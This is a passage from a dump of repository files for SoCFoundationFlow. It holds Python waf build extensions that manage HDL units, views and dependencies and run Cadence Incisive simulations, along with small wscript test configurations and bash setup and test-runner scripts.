pickle.loads(ctx.env['SFFUnits'])\n new_SFFUnits.ctx = ctx\n for name,unit in new_SFFUnits.units.iteritems():\n unit.unpack(ctx)\n return new_SFFUnits\n\n\n@conf\nclass SFFUnit:\n def __init__(self, ctx, *args, **kwargs):\n \"\"\"\n Create a SFFUnit object.\n \"\"\"\n cur_view = 'default'\n\n try:\n if len(args) == 2:\n if isinstance(args[0], str) and isinstance(args[1], str):\n self.name = args[0]\n cur_view = 'args[1]'\n if len(args) == 1:\n if isinstance(args[0], str):\n self.name = args[0]\n elif len(args) == 0:\n self.name = str(ctx.path)\n else:\n raise\n except:\n raise ctx.errors.ConfigurationError(\n 'Malformed SFFUnit() in: {0}.\\n{1}'.format(\n ctx.cur_script.srcpath(), ctx.cur_script.read()))\n\n self.ctx = ctx\n self._packed = False\n self._check = False\n self.simu_deps = []\n self.synu_deps = []\n\n #Script that created us\n self.script = ctx.cur_script\n #Dictionary for the different views\n self._v = {}\n #Post inheritance view\n self._k = SFFView(self)\n #Dictionary for build keys that are attached by other tools\n self.b = {}\n\n self.addview(cur_view, **kwargs)\n\n def __repr__(self):\n string = \"SFFUnit {0}\\n\".format(self.name)\n string.join('{}{}'.format(key, val) for key, val in self.__dict__.items())\n return string\n\n def addview(self, view, **kwargs):\n if view in self._v:\n raise Errors.ConfigurationError(\n (\"SoCManager: Error. View names must be unique. 
Module '{0}'\"\n \" from script '{1}' already has view '{2}'\").format(\n self.name, self.script.srcpath(), view))\n\n #Create & store the kwargs into the view\n self._v[view] = SFFView(self, **kwargs)\n\n def applyinheritance(self, views, keys = None):\n \"\"\"\n 1) Go through the --views in the order specified in the list views.\n 2) Test the first char to see if it is '+'\n 3) If keys is a list process only them. If keys = False process all\n keys.\n Note if a view doesn't have a '+' we are simply overwriting data from other views. If it is a '+view' we append to existing keys and create\n new ones. We apply str -> list conversion here \"on demand\"\n \"\"\"\n\n for view in views:\n addview = False\n if view[0] is '+':\n view = view[1:]\n addview = True\n\n if view in self._v:\n if keys:\n keys_ck = keys\n else:\n keys_ck = self._v[view].keys()\n for k in keys_ck:\n if addview is False:\n if k in self._v[view].keys():\n newkey = SFFutil.strtolist(self._v[view].get(k))\n self._k.add(k, newkey)\n else:\n if k not in self._k.keys() and k in self._v[view].keys():\n newkey = SFFutil.strtolist(self._v[view].get(k))\n self._k.add(k, newkey)\n elif k in self._k.keys() and k in self._v[view].keys():\n newkey = SFFutil.strtolist(self._v[view].get(k))\n oldkey = self._k.get(k)\n self._k.add(k, oldkey + newkey)\n\n def check_all(self):\n \"\"\"\n Check all views\n \"\"\"\n if self._check:\n raise Errors.ConfigurationError(\n \"'{0}': Error. Module has already been checked.\".format(\n self.name))\n else:\n self._check = True\n\n try:\n for v in self._v:\n self._v[v].check()\n except SFFerrors.Error as e:\n raise Errors.ConfigurationError(\n (\"Module '{0}': Error. View '{1}' failed check with \"\n \"message: {2}\".format(self.name, v, e.msg)))\n\n def pack(self):\n env = self.ctx.env\n self.script = self.script.srcpath()\n delattr(self,'ctx')\n self._k.pack()\n for view in self._v:\n self._v[view].pack()\n self._packed = True\n\n def unpack(self, ctx):\n self.ctx = ctx\n self.script = ctx.path.make_node(self.script)\n self._k.unpack(self)\n for view in self._v:\n self._v[view].unpack(self)\n self._packed = False\n\n def use(self, key):\n if key == 'includes':\n nodes = set()\n if self.synu_deps:\n for u in self.synu_deps:\n nodes.update(u.use('_includes'))\n if self.use('_includes'):\n nodes.update(self.use('_includes'))\n if nodes:\n return nodes\n else:\n raise SFFerrors.Error(\"Key includes not set\")\n elif key == 'tb_includes':\n nodes = set()\n if self.simu_deps:\n for u in self.simu_deps:\n nodes.update(u.use('_tb_includes'))\n if self.use('_tb_includes'):\n nodes.update(self.use('_tb_includes'))\n if self.use('includes'):\n nodes.update(self.use('includes'))\n if nodes:\n return nodes\n else:\n raise SFFerrors.Error(\"Key includes not set\")\n else:\n return self._k.use(key)\n\n def get(self, key):\n return self._k.get(key)\n\n def add(self, key, thing):\n self._k.add(key, thing)\n\n def set_deps(self, synu, simu):\n self.synu_deps = synu\n self.simu_deps = simu\n\n@conf\nclass SFFView():\n \"\"\"\n NEW PLAN:\n Hold the user settings from the file.\n On-the-fly generate what is asked using those to drive the algo. 
Forget\n caching them in dicts or anything like that.\n \"\"\"\n\n def __init__(self, unit, **kwargs):\n self.unit = unit\n self._k = {}\n\n for key,val in kwargs.items():\n self._k[key] = SFFutil.strtolist(val)\n\n def __repr__(self):\n key_str = ''\n for key in self._validkeys:\n key_str += str(key) + ': ' + str(self.use(key)) + '\\n'\n return (\"SFFView contents:\\n\" + key_str)\n\n _validkeys = ('name','unit_top','use','src_dir','src','_includes',\n 'tb_dir','tb_src','_tb_includes','tb','tb_use')\n\n def check(self):\n for key in self._validkeys:\n self.use(key)\n\n def keys(self):\n return self._k.keys()\n\n def validkeys(self):\n return self._validkeys\n\n def get(self, k):\n return self._k.get(k)\n\n def add(self, k, thing):\n self._k[k] = thing\n\n def extend(self, k, thing):\n self._k[k].extend(thing)\n\n def use(self, key):\n hdl_ext = []\n hdl_ext += self.unit.ctx.env.VLOG_EXT\n hdl_ext += self.unit.ctx.env.SVLOG_EXT\n hdl_ext += self.unit.ctx.env.VHDL_EXT\n\n if key == 'name':\n return [self.unit.name]\n if key == 'unit_top':\n if self.get(key):\n return self.get(key)\n else:\n return self.use('name')\n if key == 'use':\n return self.get(key)\n if key == 'tb_use':\n return self.get(key)\n if key == 'src':\n nodes = set()\n if self.get('src'):\n nodes.update(self._getnodes(self.get('src'), False))\n if self.get('src_dir'):\n nodes.update(self._searchnodes(self.get('src_dir'), hdl_ext,\n False)[0])\n else:\n nodes.update(self._searchnodes(['src'], hdl_ext)[0])\n return nodes\n if key == 'src_dir':\n nodes = set()\n if self.get('src_dir'):\n nodes.update(self._getnodes(self.get('src_dir'), False))\n else:\n nodes.update(self._getnodes(['src']))\n return nodes\n if key == 'tb_src':\n nodes = set()\n if self.get('tb_src'):\n nodes.update(self._getnodes(self.get('tb_src'), False))\n if self.get('tb_dir'):\n nodes.update(self._searchnodes(self.get('tb_dir'), hdl_ext,\n False)[0])\n else:\n nodes.update(self._searchnodes(['tb'], hdl_ext)[0])\n return nodes\n if key == 'tb_dir':\n nodes = set()\n if self.get('tb_dir'):\n nodes.update(self._getnodes(self.get('tb_dir'), False))\n else:\n nodes.update(self._getnodes(['tb']))\n return nodes\n if key == '_includes':\n nodes = set()\n if self.get('includes'):\n nodes.update(self._getnodes(self.get('includes'), False))\n else:\n nodes.update(self.use('src_dir'))\n return nodes\n if key == '_tb_includes':\n nodes = set()\n if self.get('tb_includes'):\n nodes.update(self._getnodes(self.get('tb_includes'), False))\n else:\n nodes.update(self.use('src_dir'))\n nodes.update(self.use('tb_dir'))\n return nodes\n if key == 'tb':\n if self.get('tb'):\n return self.get('tb')\n else:\n return ['tb_'+self.use('name')[0]]\n else:\n raise SFFerrors.Error(\"Key {0} not understood\".format(key))\n\n def _getnodes(self, list_, silentfail=True):\n nodes = set()\n dir_ = self.unit.script.parent\n for name in list_:\n n = dir_.find_node(name)\n if n in nodes:\n raise SFFerrors.Error(\"File or dir: {0} already specified\"\n .format(dir_.srcpath() + '/' + name))\n elif n is not None:\n nodes.add(n)\n elif not silentfail:\n raise SFFerrors.Error(\"File or dir: {0} not found\"\n .format(dir_.srcpath() + '/' + name))\n return nodes\n\n def _searchnodes(self, list_, ext='.*', silentfail=True):\n #Try to create node before search!\n dirnodes = set()\n for d in list_:\n node = self.unit.script.parent.find_node(d)\n if node:\n dirnodes.add(node)\n elif not silentfail:\n raise SFFerrors.Error(\"Directory {0} not found\".format(d))\n\n filenodes = set()\n dirnodeswithsrc = 
set()\n\n for d in dirnodes:\n new_files = []\n for e in ext:\n new_files += d.ant_glob('**/*{0}'.format(e))\n for n in new_files:\n filenodes.add(n)\n if new_files:\n dirnodeswithsrc.add(d)\n else:\n if not silentfail:\n raise SFFerrors.Error((\"Directory {0} contained no sources \"\n \"ending in: {1}\".format(d, ext)))\n\n return filenodes,dirnodeswithsrc\n\n def pack(self):\n delattr(self, 'unit')\n pass #self.unit = self.unit.abspath()\n\n def unpack(self, unit):\n self.unit = unit\n pass\n\n@conf\ndef setup_hdl_module(self, *args, **kwargs):\n self.msg('SFFUnits.setup_hdl_module() depreciated', ('Replace with '\n 'SFFUnits.add()'), color='YELLOW')\n self.SFFUnits.add(*args, **kwargs)\n\ndef load_SFFUnits(ctx):\n new_SFFUnits = pickle.loads(ctx.env['SFFUnits'])\n new_SFFUnits.ctx = ctx\n new_SFFUnits.unpack(ctx)\n return new_SFFUnits\n\nimport re, sys, os\ndef SFF_verilog_scan(task):\n \"\"\"\n scan for dependencies using the Veripool vppreprocessor tool. Execute the\n preprocessor using the includes and collect the output. Then grep it for\n `line directives, extract the file name and add to a set to eliminate\n duplicates. Then convert the list to nodes and return.\n \"\"\"\n env = task.env\n gen = task.generator\n bld = gen.bld\n wd = bld.bldnode.abspath()\n exec_env = {}\n cmd = []\n cmd.extend(['vppreproc'])\n #Ugly hack here as includes are not propagated into the task\n if(hasattr(gen, 'includes')):\n includes = [a.path_from(bld.bldnode) for a in gen.includes]\n for include in includes:\n cmd.extend(['-y',include])\n files = [a.path_from(bld.bldnode) for a in task.inputs]\n cmd += files\n\n (out,err) = bld.cmd_and_log(cmd, cwd=bld.variant_dir, output=Context.BOTH,\n quiet=Context.STDOUT)\n\n #Match the `line directives\n lst_src = []\n seen = set([])\n line_det = re.compile(r'`line.*\"(.*)\"')\n for x in Utils.to_list(line_det.findall(out)):\n if x in files:\n seen.add(x)\n if x in seen or not x:\n continue\n seen.add(x)\n if os.path.isabs(x):\n lst_src.append(bld.root.make_node(x) or x)\n else:\n p = bld.path.get_bld().make_node(x)\n lst_src.append(p)\n return (lst_src, [])\n\n\n"
},
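The `_buildunitdeps` recursion in the SFFbuildmgr.py record above orders units leaf-first so every `use` prerequisite is compiled before its dependents. A minimal, self-contained sketch of that ordering, assuming a plain dict from unit names to their `use` lists (the example units mirror the `waf_test/basic_dependencies` records later in this dump):

```python
# Leaf-first dependency ordering in the spirit of _buildunitdeps;
# the `units` dict is illustrative example data, not from the repo.

def build_order(units, name, order=None):
    """Return unit names with every prerequisite before its user."""
    if order is None:
        order = []                      # avoid a shared mutable default
    if name in order:
        return order                    # already scheduled
    for dep in units[name]:             # KeyError here plays the role of
        build_order(units, dep, order)  # the tool's "unit not defined" error
    order.append(name)
    return order

# l4 -> l3 -> {l2, l2_5} -> l1, as in waf_test/basic_dependencies
units = {'l1': [], 'l2': ['l1'], 'l2_5': ['l1'],
         'l3': ['l2', 'l2_5'], 'l4': ['l3']}
print(build_order(units, 'l4'))         # ['l1', 'l2', 'l2_5', 'l3', 'l4']
```

The real implementation additionally prunes unused units and keeps separate synthesis (`use`) and simulation (`tb_use`) orders.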
{
"alpha_fraction": 0.6727272868156433,
"alphanum_fraction": 0.6727272868156433,
"avg_line_length": 26,
"blob_id": "93fa19fe38a48f69fb2ecb23adefa2abfebd6e0f",
"content_id": "1d4ffe54b111743ab5c90c7dba73bb961d03c752",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 2,
"path": "/waf_test/RTL_compiler/basic/dual_uart/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add('dual_uart')\n"
},
{
"alpha_fraction": 0.6260504126548767,
"alphanum_fraction": 0.6302521228790283,
"avg_line_length": 18.75,
"blob_id": "c6feb89b4d04e6561e57dbeb39ae22bfe04b593a",
"content_id": "9fc7058254a0083b330736150e1720cfc5e3b89b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 238,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 12,
"path": "/waf_test/basic_modules/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n\ndef configure(ctx):\n ctx.recurse('include_only')\n ctx.recurse('src_only')\n ctx.recurse('tb_include_only')\n ctx.recurse('tb_only')\n ctx.recurse('two_src')\n\ndef build(ctx):\n pass\n\n"
},
{
"alpha_fraction": 0.5045045018196106,
"alphanum_fraction": 0.5315315127372742,
"avg_line_length": 18.600000381469727,
"blob_id": "28dc0ee95d8635edd2a7f865bac06951faa30105",
"content_id": "d96fb439f80cee426c8560b3cdf66c45a0851736",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 222,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 10,
"path": "/waf_test/basic_dependencies/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": " \ndef configure(ctx):\n ctx.recurse('l1')\n ctx.recurse('l2')\n ctx.recurse('l2_5')\n ctx.recurse('l3')\n ctx.recurse('l4')\n ctx.recurse('basic_dependencies')\n\ndef build(ctx):\n pass\n\n\n \n \n"
},
{
"alpha_fraction": 0.5670395493507385,
"alphanum_fraction": 0.5723826885223389,
"avg_line_length": 31.021390914916992,
"blob_id": "b16c8bb3d623d74a4522d2284c5fc2c6f8b4e691",
"content_id": "62ac6459fc821cc20a4bc35cc69fb0a8ec12cdc7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5989,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 187,
"path": "/admin/waf/waf-extensions/SFFincisive.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n# Matthew Swabey, 2015\n\n\"\"\"\nClasses and helper functions used to provide\n\"sim_source\"\n\"verify_source\"\nvia the Cadence Incisive Suite.\n\nTODO: Read book section 8.4.3\n1) Create tasks using taskgen\n2) Create function to prep strings and includes\n3) Try to use the examples to find the files created by ncvlog inside the lib dir and add it to the deps to get proper dependency tracking and cleaning.\n\"\"\"\n\nfrom waflib import Context\nfrom waflib import Build\nfrom waflib import Logs\nfrom waflib import Node\nfrom waflib import TaskGen\nfrom waflib import Task\nfrom waflib import Utils\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import feature, before_method, after_method\nimport pickle\nimport os,sys\nfrom SFFbuildmgr import SFF_verilog_scan\nfrom SFFbuildmgr import SFFUnitsCont, SFFUnit, SFFView, load_SFFUnits\n\ndef configure(ctx):\n \"\"\"\n Incisive: Find all the necessary parts of the Incisive Simulator.\n \"\"\"\n ctx.find_program('ncvlog')\n ctx.find_program('ncvhdl')\n ctx.find_program('ncsim')\n ctx.find_program('ncelab')\n\ndef _simulate(ctx, gui):\n \"\"\"\n Load the SFFUnits into the system.\n Create the necessary tasks to build the simulation libs\n Create a toplevel CDS.lib and hdl.var with the mappings for all the\n libraries and deps.\n Kick ncelab targetting the testbench\n Kick ncsim targetting the testbench\n \"\"\"\n ctx.env['SFFUnits'] = load_SFFUnits(ctx)\n\n #units_taskgen(ctx)\n \"\"\"\n Creates the directory path and nodes in the build directory.\n Creates the testbench library separately\n Creates a taskgen from each other library in units_hdl\n \"\"\"\n\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n\n for u in top.synu_deps + top.simu_deps:\n lib = u.script.parent.get_bld().make_node(u.name+'_nclib')\n lib.mkdir()\n u.b['nclib'] = lib\n\n if u.use('use'):\n tsk = IncisiveTask(\n name=u.name,\n target=lib,\n source=u.use('src'),\n includes=u.use('includes'),\n after=u.use('use'),\n output=lib,\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n else:\n tsk = IncisiveTask(\n name=u.name,\n target=lib,\n source=u.use('src'),\n output=lib,\n includes=u.use('includes'),\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n\n\n \"\"\"\n Create the testbench taskgen last as it is always at the top dep\n \"\"\"\n tb_lib = top.script.parent.get_bld().make_node(top.use('tb')[0]+'_nclib')\n tb_lib.mkdir()\n top.b['tbnclib'] = tb_lib\n\n tsk = IncisiveTask(\n name=top.use('tb'),\n target=tb_lib,\n source=top.use('tb_src'),\n output=tb_lib,\n includes=top.use('tb_includes'),\n after=ctx.env.top_level,\n scan=SFF_verilog_scan,\n env=ctx.env )\n ctx.add_to_group(tsk)\n \"\"\"\n Create the cds.lib and hdl.var in the toplevel of the build directory with\n the testbench defined in cds.lib and as WORKLIB in hdl.var.\n \"\"\"\n build_cds_lib_file(ctx)\n build_hdl_var_file(ctx)\n\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n #Run ncelab\n ctx(name='ncelab',\n rule='${NCELAB} -timescale ''1ns/10ps'' -access rwc %s' % top.use('tb')[0],\n always = True,)\n\n #Run ncsim\n ctx(name='ncsim',\n rule='${NCSIM} %s %s' % (gui,top.use('tb')[0]),\n always = True,\n after='ncelab')\n\nclass IncisiveTask(Task.Task):\n def __init__(self, *k, **kw):\n Task.Task.__init__(self, *k, **kw)\n\n self.dep_vars = ['VLOG_EXT']\n self.dep_vars += ['VHDL_EXT']\n self.dep_vars += ['SVLOG_EXT']\n self.dep_vars += ['SDC_EXT']\n\n self.set_inputs(list(kw['source']))\n 
self.set_outputs(kw['output'])\n self.includes = kw['includes']\n self.before = ['ncelab','ncsim']\n from types import MethodType\n self.scan = MethodType(kw['scan'],self)\n\n\n def __str__(self):\n return '%s: %s\\n' % (self.__class__.__name__,self.outputs[0])\n\n def run(self):\n src = ''\n for s in self.inputs:\n src += s.bldpath() + ' '\n tgt = self.outputs[0].bldpath()\n incs = ''\n if hasattr(self.generator,'includes'):\n incs = ''\n for inc in getattr(self.generator,'includes'):\n incs += '-incdir ' + inc.bldpath() + ' '\n res = ''\n cmd = '%s -SV -linedebug -work %s %s %s' % (self.env['NCVLOG'][0], self.outputs[0],\n incs, src)\n return self.exec_command(cmd)\n\n\ndef build_cds_lib_file(ctx):\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n cds_lib = ctx.path.make_node('cds.lib').get_bld()\n cds_lib.write('DEFINE {0} ./{1}\\n'.format(top.b['tbnclib'],\n top.b['tbnclib'].bldpath()))\n for m in ctx.env['SFFUnits'].units:\n md = ctx.env['SFFUnits'].getunit(m)\n cds_lib.write('DEFINE {0} ./{1}\\n'.format((md.b['nclib']),\n md.b['nclib'].bldpath()), flags='a')\n\ndef build_hdl_var_file(ctx):\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n hdl_var = ctx.path.make_node('hdl.var').get_bld()\n hdl_var.write('DEFINE WORK {0}\\n'.format(top.b['tbnclib']))\n hdl_var.write('DEFINE LIB_MAP (\\\\\\n', flags='a')\n tb_dir = top.use('tb_dir')\n hdl_var.write('./{0}/... => {1}'.format(tb_dir.pop().bldpath(),\n top.b['tbnclib']), flags='a')\n if tb_dir:\n for d in tb_dir:\n hdl_var.write(',\\\\\\n./{0}/... => {1}'.format(d.bldpath(),\n top.b['nclib']), flags='a')\n for m in ctx.env['SFFUnits'].units:\n md = ctx.env['SFFUnits'].getunit(m)\n for d in md.use('src_dir'):\n hdl_var.write(',\\\\\\n./{0}/... => {1}'.format(d.bldpath(),\n md.b['nclib']), flags='a')\n hdl_var.write(')\\n', flags='a')\n\n"
},
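`build_cds_lib_file` in the SFFincisive.py record above writes one `DEFINE <lib> ./<path>` line per unit library so Incisive can resolve the compiled work libraries. A short sketch of that output format, with invented library names and paths:

```python
# Shape of the cds.lib file emitted by build_cds_lib_file; the library
# names and paths below are made up for illustration.
libs = {
    'tb_uart_nclib': 'waf_test/uart/tb_uart_nclib',
    'uart_nclib': 'waf_test/uart/uart_nclib',
}

with open('cds.lib', 'w') as f:
    for name, path in libs.items():
        f.write('DEFINE {0} ./{1}\n'.format(name, path))
```

In the real code the testbench library is written first, because the companion `hdl.var` file maps `WORK` to it.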
{
"alpha_fraction": 0.6112532019615173,
"alphanum_fraction": 0.6138107180595398,
"avg_line_length": 21.882352828979492,
"blob_id": "a41d921bf440b1714d1f7f73aeef749d512a2cfa",
"content_id": "3849b641a5af701b4f01e159bebf70fda1a1fe54",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 391,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 17,
"path": "/admin/setup_env.bash",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ -z $SFF_ADMIN ]; then\n rootdir=\"${BASH_SOURCE[0]}\";\n if ([ -h \"${rootdir}\" ]) then\n while([ -h \"${rootdir}\" ]) do rootdir=`readlink \"${rootdir}\"`; done\n fi\n pushd . > /dev/null\n cd `dirname ${rootdir}` > /dev/null\n rootdir=`pwd`;\n popd > /dev/null\nelse\n rootdir=$SFF_ADMIN\nfi\n\nexport PATH=$PATH:$rootdir/waf/waf-current\nexport WAFDIR=$rootdir/waf/waf-current\n\n\n"
},
{
"alpha_fraction": 0.6814159154891968,
"alphanum_fraction": 0.6902654767036438,
"avg_line_length": 54.5,
"blob_id": "5b6f860f99152a1f7cb963b0c15be5aeaeb184d1",
"content_id": "b379d6707626a9f8281aaa89b1cafd35ce8c9e58",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 113,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 2,
"path": "/waf_test/defaults_n_user/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(src_dir='src2',src='src/defaults.sv',includes='src',tb='tb_defaults')\n\n"
},
{
"alpha_fraction": 0.640625,
"alphanum_fraction": 0.65625,
"avg_line_length": 29.5,
"blob_id": "1bc6de2b2725ac1c6fb6208b3dde43d377d4341e",
"content_id": "df33dea6303d62ba6fefe794b2c83cb8ba9e9ee1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 2,
"path": "/waf_test/basic_modules/two_src/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\n\ndef configure(ctx):\n ctx.SFFUnits.add(src_dir='src,src2')\n\n"
},
{
"alpha_fraction": 0.6557376980781555,
"alphanum_fraction": 0.6571038365364075,
"avg_line_length": 22.612903594970703,
"blob_id": "99d2f7827a921c5594850f7481b4a03e3ee75596",
"content_id": "11258827a911867cbe49ddc708b53fcf2c22ed6e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 31,
"path": "/waf_test/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n\nimport os\ntoolpath = os.environ['WAFDIR'] + '/../waf-extensions'\n\ntop = '.'\nout = 'build'\n\n\ndef options(ctx):\n ctx.load('SFFbuildmgr', tooldir=toolpath)\n ctx.load('SFFtask', tooldir=toolpath)\n #ctx.load('RTL_compiler', tooldir=toolpath)\n ctx.load('why')\n\ndef configure(ctx):\n ctx.load('SFFbuildmgr', tooldir=toolpath)\n ctx.load('SFFtask', tooldir=toolpath)\n #ctx.load('RTL_compiler', tooldir=toolpath)\n ctx.load('why')\n ctx.recurse('defaults')\n ctx.recurse('defaults_n_user')\n ctx.recurse('basic_modules')\n ctx.recurse('basic_dependencies')\n ctx.recurse('find_src')\n ctx.recurse('basic_views')\n ctx.SFFUnits.finalize()\n\ndef build(ctx):\n pass\n"
},
{
"alpha_fraction": 0.5862069129943848,
"alphanum_fraction": 0.6379310488700867,
"avg_line_length": 27,
"blob_id": "12f82423f7120c0437fb7611679f75eeb8a3bf87",
"content_id": "c01509b240bbf57bec9376aef23fa675cf19b433",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 58,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 2,
"path": "/waf_test/basic_dependencies/l3/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(use='l2,l2_5')\n\n"
},
{
"alpha_fraction": 0.6225000023841858,
"alphanum_fraction": 0.6299999952316284,
"avg_line_length": 35.3636360168457,
"blob_id": "ebad2e2a80e1fa99d6c52e73578e23bfb1cdb242",
"content_id": "334accf705e2c37f23d116d75d51ad06d830d0d3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 400,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 11,
"path": "/waf_test/run_incisive.tcsh",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ntests=(defaults defaults_n_user basic_dependencies include_only src_only tb_include_only tb_only two_src find_src basic_views)\n\nfor ((i = 0; i < ${#tests[@]}; i++)); do\n printf \"\\nRunning: ${tests[$i]} \\n\"\n printf \"waf configure --top_level=${tests[$i]} verify_source\\n\"\n eval \"waf configure --top_level=${tests[$i]} verify_source\"\n if [ $? -ne 0 ]; then exit 1; fi\n\ndone\n"
},
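The `run_incisive.tcsh` record above loops over the test tops and aborts on the first failing `waf configure --top_level=<t> verify_source`. The same driver expressed in Python (a sketch; only the command strings come from the script):

```python
# Python rendering of the run_incisive loop; 'tests' is a subset of the
# names in the script, everything else follows the shell version.
import subprocess
import sys

tests = ['defaults', 'defaults_n_user', 'basic_dependencies']

for t in tests:
    cmd = ['waf', 'configure', '--top_level={0}'.format(t), 'verify_source']
    print('Running:', ' '.join(cmd))
    if subprocess.call(cmd) != 0:   # mirror the script's exit-on-failure
        sys.exit(1)
```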
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.6415094137191772,
"avg_line_length": 24.5,
"blob_id": "054bb9725b687d6d9bcbad56d8e37f0387ec3fe5",
"content_id": "0f1d67b000adf422f2babc5d16e0d30cc0df03e4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 2,
"path": "/waf_test/basic_dependencies/l2_5/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(use='l1')\n\n"
},
{
"alpha_fraction": 0.7233009934425354,
"alphanum_fraction": 0.7233009934425354,
"avg_line_length": 33.16666793823242,
"blob_id": "e615d57118ef7e2459f45e3be668769968be883a",
"content_id": "229b5f33275238016f0c44dc180acb4207890d0e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 6,
"path": "/waf_test/basic_views/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "# This test attaches the meaningless kwarg bar into the views for tracking\n# purposes only.\n\ndef configure(ctx):\n ctx.SFFUnits.add(bar='default')\n ctx.SFFUnits.addview('basic_views','foo',bar='foo')\n\n"
},
{
"alpha_fraction": 0.6727272868156433,
"alphanum_fraction": 0.6727272868156433,
"avg_line_length": 25.5,
"blob_id": "e945211fadb018838be20856c31bdbec6222ba98",
"content_id": "040962860e0b27c6b4bd3d67bc73497debf085d3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 2,
"path": "/waf_test/defaults/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add('defaults')\n\n"
},
{
"alpha_fraction": 0.5544747114181519,
"alphanum_fraction": 0.561284065246582,
"avg_line_length": 35.71428680419922,
"blob_id": "00f3655cbb6864704905c5c84454b63f16f60dd0",
"content_id": "d1289360960f7a855214c491fbf854b0c106e0f5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1028,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 28,
"path": "/admin/waf/waf-extensions/SFFutil.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "from waflib import Errors\nfrom waflib import Node\nimport SFFerrors\n\ndef strtolist(string_or_list):\n if isinstance(string_or_list, str):\n return [s.strip() for s in string_or_list.split(',')]\n elif isinstance(string_or_list, (list, set)):\n return string_or_list\n raise SFFerrors.Error(\n (\"strtolist passed type: '{0}' instead of str or list\")\n .format(type(string_or_list)))\n \ndef list2nodes(self, subdir, list_, silent_fail):\n nodes = set()\n for file_ in list_:\n n = subdir.find_node(file_) \n if n in nodes:\n raise Errors.ConfigurationError(\n \"'{0}': Node '{1}' already exits in list '{2}'.\".format(\n self.name, subdir.srcpath() + '/' + n, list_))\n elif n is not None:\n nodes.add(n)\n elif not silent_fail:\n raise Errors.ConfigurationError(\n \"'{0}': Failed to find '{1}' on disk.\".format(\n self.name, subdir.srcpath() + '/' + node))\n return nodes\n"
},
